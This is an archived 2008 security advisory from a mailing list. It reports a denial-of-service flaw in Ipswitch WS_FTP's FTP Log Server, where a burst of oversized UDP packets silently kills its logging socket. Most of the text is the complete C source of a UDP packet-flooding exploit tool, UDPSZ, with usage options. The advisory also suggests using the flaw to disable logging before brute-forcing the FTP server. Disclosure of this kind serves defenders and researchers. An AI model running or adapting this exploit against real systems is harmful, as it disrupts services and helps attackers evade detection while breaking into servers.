[NT] FTP Log Server Socket Termination
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 5 Feb 2008 08:43:24 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
FTP Log Server Socket Termination
------------------------------------------------------------------------
SUMMARY
<http://www.wsftp.com> FTP Log Server is "a daemon installed and running
with Ipswitch WS_FTP which works on the UDP port 5151 and is used for all
the logging operations of this FTP server". By sending the FTP Log Server
a few packets that contain malformed data an attacker can cause the daemon
to crash.
DETAILS
Vulnerable Systems:
* FTP Log Server version 7.9.14.0 and prior
Sending more than 20 packets whose size is bigger than 4096 bytes (the
maximum size of a packet which can be received by the server) within less
than one second between them causes the silent termination of the
listening socket (offset 004013FD), so the process of the daemon will
continue to be active but it will no longer handle the log commands of the
FTP or any other server which supports it.
Although the daemon binds all the interfaces (and Luigi doubts an admin
leaves the UDP port 5151 accessible from Internet, moreover to avoid
custom entries in the XML logs) the main scenario of a possible exploiting
of this vulnerability is in a LAN environment for example used for
disabling the logging service and starting a brute forcing attack versus
the machine on which is running the FTP server and so on.
Exploit:
/*
Copyright 2006 Luigi Auriemma - http://aluigi.org/testz/udpsz.zip
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
USA
http://www.gnu.org/licenses/gpl.txt
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <ctype.h>
#include <sys/stat.h>
#ifdef WIN32
#include <winsock.h>
#include "winerr.h"
#define close closesocket
#define sleep Sleep
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>
#endif
#define VER "0.1"
u_char *load_file(u_char *filename, int *size);
int create_socket(void);
u_char get_byte(u_char *data);
int get_num(u_char *data);
int create_rand_byte(u_char *data, int len, u_int *seed);
u_int resolv(char *host);
void std_err(void);
int main(int argc, char *argv[]) {
struct sockaddr_in peer,
peerl;
u_int seed;
int sd = 0,
i,
size,
randport = 0,
randbyte = 0,
loop = 0,
loopms = 0,
chr = 0;
u_short port,
sport = 0;
u_char *buff,
*filename = NULL;
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
setbuf(stdout, NULL);
fputs("\n"
"UDPSZ "VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@xxxxxxxxxxxxx\n"
"web: aluigi.org\n"
"\n", stdout);
if(argc < 4) {
printf("\n"
"Usage: %s [options] <host> <port> <pck_size>\n"
"\n"
"Options:\n"
"-b BYTE fill the packet with byte BYTE, which can be a
char or a hex\n"
" example: -b a or -b 0x61 or -b 61\n"
"-r random packet content\n"
"-s packet filled with incremental byte (use -b for
the start byte)\n"
"-p PORT use source port PORT\n"
"-R random source port\n"
"-S sequential source port\n"
"-f FILE load the content of the packet from FILE, the size
will be\n"
" truncated at pck_size, set it to -1 for using the
file size\n"
"-l MS send infinite packets with a delay of MS
milliseconds\n"
"\n", argv[0]);
exit(1);
}
argc -= 3;
for(i = 1; i < argc; i++) {
switch(argv[i][1]) {
case 'b': chr = get_byte(argv[++i]); break;
case 'r': randbyte = 1; break;
case 's': randbyte = 2; break;
case 'p': sport = get_num(argv[++i]); break;
case 'R': randport = 1; break;
case 'S': randport = 2; break;
case 'l': {
loop = 1;
loopms = get_num(argv[++i]);
} break;
case 'f': filename = argv[++i]; break;
default: {
printf("\nError: wrong command-line argument (%s)\n\n",
argv[i]);
exit(1);
} break;
}
}
port = get_num(argv[argc + 1]);
size = get_num(argv[argc + 2]);
peer.sin_addr.s_addr = resolv(argv[argc]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
printf("- target %s : %hu\n",
inet_ntoa(peer.sin_addr), port);
seed = time(NULL);
if(filename) {
buff = load_file(filename, &size);
} else {
buff = malloc(size);
if(!buff) std_err();
if(!randbyte) {
memset(buff, chr, size);
}
}
printf("- packet size: %d\n", size);
if(randport) {
peerl.sin_addr.s_addr = INADDR_ANY;
peerl.sin_port = htons(~seed);
peerl.sin_family = AF_INET;
} else {
sd = create_socket();
}
if(sport && !randport) {
peerl.sin_addr.s_addr = INADDR_ANY;
peerl.sin_port = htons(sport);
peerl.sin_family = AF_INET;
printf("- source port: %hu\n", sport);
if(bind(sd, (struct sockaddr *)&peerl, sizeof(peerl))
< 0) std_err();
}
#ifndef WIN32
loopms *= 1000;
#endif
printf("- send packets: ");
for(;;) {
if(randbyte == 2) {
memset(buff, chr++, size);
} else if(randbyte == 1) {
create_rand_byte(buff, size, &seed);
}
if(randport) {
sd = create_socket();
do {
if(randport == 2) { // sequential
peerl.sin_port = htons(sport++);
} else {
peerl.sin_port += seed; // not really random
}
} while(bind(sd, (struct sockaddr *)&peerl, sizeof(peerl)) <
0);
}
if(sendto(sd, buff, size, 0, (struct sockaddr *)&peer,
sizeof(peer))
< 0) std_err();
fputc('.', stdout);
if(randport) {
close(sd);
}
if(!loop) break;
#ifdef WIN32
sleep(loopms);
#else
usleep(loopms);
#endif
}
if(!randport) {
close(sd);
}
free(buff);
printf("\n- finished\n");
return(0);
}
u_char *load_file(u_char *filename, int *size) {
struct stat xstat;
FILE *fd;
u_char *buff;
printf("- load file: %s\n", filename);
fd = fopen(filename, "rb");
if(!fd) std_err();
fstat(fileno(fd), &xstat);
if((*size < 0) || (*size > xstat.st_size)) {
*size = xstat.st_size;
}
buff = malloc(*size);
if(!buff) std_err();
fread(buff, *size, 1, fd);
fclose(fd);
return(buff);
}
int create_socket(void) {
int sd,
on = 1;
sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0) std_err();
setsockopt(sd, SOL_SOCKET, SO_BROADCAST, (char *)&on, sizeof(on)); //
useful?
return(sd);
}
u_char get_byte(u_char *data) {
int chr;
if(strlen(data) == 1) {
return(data[0]);
}
if(tolower(data[1]) == 'x') {
data += 2;
} else if(tolower(data[0]) == 'x') {
data++;
}
sscanf(data, "%x", &chr);
return(chr);
}
int get_num(u_char *data) {
int num;
if(tolower(data[1]) == 'x') {
sscanf(data + 2, "%x", &num);
} else if(tolower(data[0]) == 'x') {
sscanf(data + 1, "%x", &num);
} else {
sscanf(data, "%d", &num);
}
return(num);
}
int create_rand_byte(u_char *data, int len, u_int *seed) {
u_int rnd;
u_char *p;
rnd = *seed;
p = data;
while(len--) {
rnd = (rnd * 0x343FD) + 0x269EC3;
rnd >>= 3; // useless???
*p++ = rnd & 0xff;
}
*seed = rnd;
return(p - data);
}
u_int resolv(char *host) {
struct hostent *hp;
u_int host_ip;
host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf("\nError: Unable to resolv hostname (%s)\n", host);
exit(1);
} else host_ip = *(u_int *)hp->h_addr;
}
return(host_ip);
}
#ifndef WIN32
void std_err(void) {
perror("\nError");
exit(1);
}
#endif
ADDITIONAL INFORMATION
The information has been provided by <mailto:aluigi@xxxxxxxxxxxxx> Luigi
Auriemma.
The original article can be found at:
<http://aluigi.altervista.org/adv/ftplogsrvz-adv.txt>
http://aluigi.altervista.org/adv/ftplogsrvz-adv.txt
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Prev by Date: [UNIX] IBM Informix Dynamic Server onedcu File Creation Vulnerability
- Next by Date: [NT] SAPlpd Multiple Vulnerabilities
- Previous by thread: [UNIX] IBM Informix Dynamic Server onedcu File Creation Vulnerability
- Next by thread: [NT] SAPlpd Multiple Vulnerabilities
- Index(es):
Relevant Pages
|
|
